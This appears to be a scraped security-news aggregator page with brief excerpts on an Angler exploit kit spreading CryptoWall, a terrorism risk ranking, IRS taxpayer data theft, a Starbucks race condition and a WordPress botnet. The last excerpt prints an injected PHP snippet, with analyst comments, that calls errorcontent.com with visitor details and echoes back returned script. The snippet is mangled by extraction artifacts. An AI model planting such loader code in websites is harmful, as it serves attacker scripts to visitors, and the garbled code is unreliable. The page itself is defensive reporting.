Varanoid.com

Angler exploit kit pushing CryptoWall 3.0, (Thu, May 28th) 0

Angler exploit kit pushing CryptoWall 3.0, (Thu, May 28th)

Introduction In the past two days, Ive infected two hosts from Angler exploit kit (EK) domains at 216.245.213.0/24. Both hosts were infected with CryptoWall 3.0 ransomware using the same bitcoin address for the ransom payment: 16Z6sidfLrfNoxJNu4qM5zhRttJEUD3XoB On Tuesday, 2015-05-26 at 15:17 UTC, I infected a host whereAngler EK sent Bedep as a malware payload before getting CryptoWall 3.0 [ 1 ].

Terrorist Risks by City, According to Actual Data 0

Terrorist Risks by City, According to Actual Data

I don’t know enough about the methodology to judge it, but it’s interesting : In total, 64 cities are categorised as ‘extreme risk’ in Verisk Maplecroft’s new Global Alerts Dashboard (GAD), an online mapping and data portal that logs and analyses every reported terrorism incident down to levels of 100m² worldwide. Based on the intensity and frequency of attacks in the 12 months following February 2014, combined with the number and severity of incidents in the previous five years, six cities in Iraq top the ranking. Over this period, the country’s capital, Baghdad, suffered 380 terrorist attacks resulting in 1141 deaths and 3654 wounded, making it the world’s highest risk urban centre, followed by Mosul, Al Ramadi, Ba’qubah, Kirkuk and Al Hillah

IRS: Crooks Stole Data on 100K Taxpayers Via ‘Get Transcript’ Feature 0

IRS: Crooks Stole Data on 100K Taxpayers Via ‘Get Transcript’ Feature

In March 2015, KrebsOnSecurity broke the news that identity thieves engaged in filing fraudulent tax refund requests with the Internal Revenue Service (IRS) were using the IRS’s own Web site to pull taxpayer data needed to complete the phony requests. Today, IRS Commissioner John Koskinen acknowledged that crooks used this feature to pull sensitive data on more than 100,000 taxpayers this year

Race Condition Exploit in Starbucks Gift Cards 0

Race Condition Exploit in Starbucks Gift Cards

A researcher was able to steal money from Starbucks by exploiting a race condition in their gift-card value-transfer protocol. Basically, by initiating two identical web transfers at once, he was able to trick the system into recording them both. Normally, you could take a $5 gift card and move that money to another $5 gift card, leaving you with an empty gift card and a $10 gift card

Possible WordPress Botnet C&C: errorcontent.com, (Tue, May 26th) 0

Possible WordPress Botnet C&C: errorcontent.com, (Tue, May 26th)

Thanks to one of our readers, for sending us this snipped of PHP he found on a Wordpress server (I added some line breaks and comments in red for readability): #2b8008# “> “> /* turn off error reporting */ @ini_set(display_errors “> /* do not display errors to the user */ $wp_mezd8610 = @$_SERVER[HTTP_USER_AGENT”> /* only run the code if this is Chrome or IE and not a bot */ if (( preg_match (/Gecko|MSIE/i, $wp_mezd8610) !preg_match (/bot/i, $wp_mezd8610))) { “> # Assemble a URL like http://errorcontent.com/content?ip=[client ip]referer=[server host name]ua=[user agent] $wp_mezd098610=http://.error.content..com/.content./? ip=.$_SERVER[REMOTE_ADDR].referer=.urlencode($_SERVER[HTTP_HOST]).ua=”> # check if we have the curl extension installed if (function_exists(curl_init) function_exists(curl_exec”> # if we dont have curl, try file_get_contents which requires allow_url_fopen. elseif (function_exists(file_get_contents) @ini_get(allow_url_fopen”> # or try fopen as a last resort elseif (function_exists(fopen) function_exists(stream_get_contents)) {$wp_8610mezd=@stream_get_contents(@fopen($wp_mezd098610, r}} if (substr($wp_8610mezd,1,3) === scr”> # The data retrieved will be echoed back to the user if it starts with the string scr.